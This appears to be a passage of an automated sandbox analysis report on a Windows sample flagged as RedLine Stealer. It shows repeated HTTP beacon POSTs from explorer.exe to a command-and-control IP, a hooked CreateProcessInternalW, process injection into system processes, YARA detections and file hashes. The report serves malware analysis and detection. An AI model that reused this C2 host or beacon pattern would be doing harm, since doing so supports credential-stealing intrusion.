                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:57.820899010 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.492404938 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:24:58 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  49192.168.2.449904176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.723320961 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:24:59.850147009 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.691906929 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:00 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  50192.168.2.449905176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:01.925447941 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:02.045257092 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:03.949779034 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:02 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  51192.168.2.449911176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.176666021 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:04.296900988 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.709698915 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:04 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  52192.168.2.449917176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:05.940238953 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:06.060149908 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.440414906 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:06 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  53192.168.2.449922176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.674076080 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:07.794384003 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.672672987 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:08 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  54192.168.2.449927176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:10.908473969 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:11.032638073 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.622927904 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:11 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  55192.168.2.449929176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:12.900785923 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:13.021151066 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.706790924 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:13 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  56192.168.2.449934176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:14.946818113 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:15.072750092 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.759512901 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:15 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  57192.168.2.449938176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:16.989470005 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:17.109296083 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:18.759552956 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:17 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  58192.168.2.449940176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.008624077 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:19.129143000 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:20.814394951 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:19 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  59192.168.2.449946176.111.174.140802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.051629066 CET279OUTPOST /VzCAHn.php?7D3ED97FB83B796922796 HTTP/1.1
                                                                                                                                                                                                                                                  Host: 176.111.174.140
                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                  Content-type: text/html
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:21.171528101 CET6OUTData Raw: 12 59 59 54
                                                                                                                                                                                                                                                  Data Ascii: YYT
                                                                                                                                                                                                                                                  Dec 4, 2024 18:25:23.984451056 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 01:25:21 GMT
                                                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                                                                  X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                                                                                  User Modules

                                                                                                                                                                                                                                                  Hook Summary

                                                                                                                                                                                                                                                  Function NameHook TypeActive in Processes
                                                                                                                                                                                                                                                  CreateProcessInternalWINLINEexplorer.exe

                                                                                                                                                                                                                                                  Processes

                                                                                                                                                                                                                                                  Process: explorer.exe, Module: KERNEL32.DLL
                                                                                                                                                                                                                                                  Function NameHook TypeNew Data
                                                                                                                                                                                                                                                  CreateProcessInternalWINLINE0xE9 0x90 0x00 0x07 0x75 0x5B

                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  Behavior

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:12:23:17
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff63a830000
                                                                                                                                                                                                                                                  File size:25'600 bytes
                                                                                                                                                                                                                                                  MD5 hash:031377E4E34DCD19917FAC02FF6DA79F
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                                  Start time:12:23:17
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6626d0000
                                                                                                                                                                                                                                                  File size:632'808 bytes
                                                                                                                                                                                                                                                  MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:12:23:17
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000002.00000002.3071197547.000001301D095000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:12:23:17
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\msiexec.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7f2d00000
                                                                                                                                                                                                                                                  File size:69'632 bytes
                                                                                                                                                                                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                                  Start time:12:23:20
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                                                                                                  Imagebase:0x7ff72b770000
                                                                                                                                                                                                                                                  File size:5'141'208 bytes
                                                                                                                                                                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.1943024821.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.1853448227.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3079258886.000000000A020000.00000020.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3082051736.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.1853992940.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3084893712.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3086867555.0000000010D60000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000002.3086011356.000000000F4A0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.1850269906.000000000A020000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.1853413572.000000000E8A0000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000004.00000000.1851595360.000000000C350000.00000020.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                                                                  Start time:12:23:29
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff7821c0000
                                                                                                                                                                                                                                                  File size:25'600 bytes
                                                                                                                                                                                                                                                  MD5 hash:031377E4E34DCD19917FAC02FF6DA79F
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                                                                  • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:6
                                                                                                                                                                                                                                                  Start time:12:23:29
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\svchost.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:12:23:29
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\audiodg.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Windows\system32\audiodg.exe"
                                                                                                                                                                                                                                                  Imagebase:0x7ff6626d0000
                                                                                                                                                                                                                                                  File size:632'808 bytes
                                                                                                                                                                                                                                                  MD5 hash:627DEA21175691FDE4495877C53B4C87
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:12:23:29
                                                                                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                                                                                  Path:C:\Windows\System32\msiexec.exe
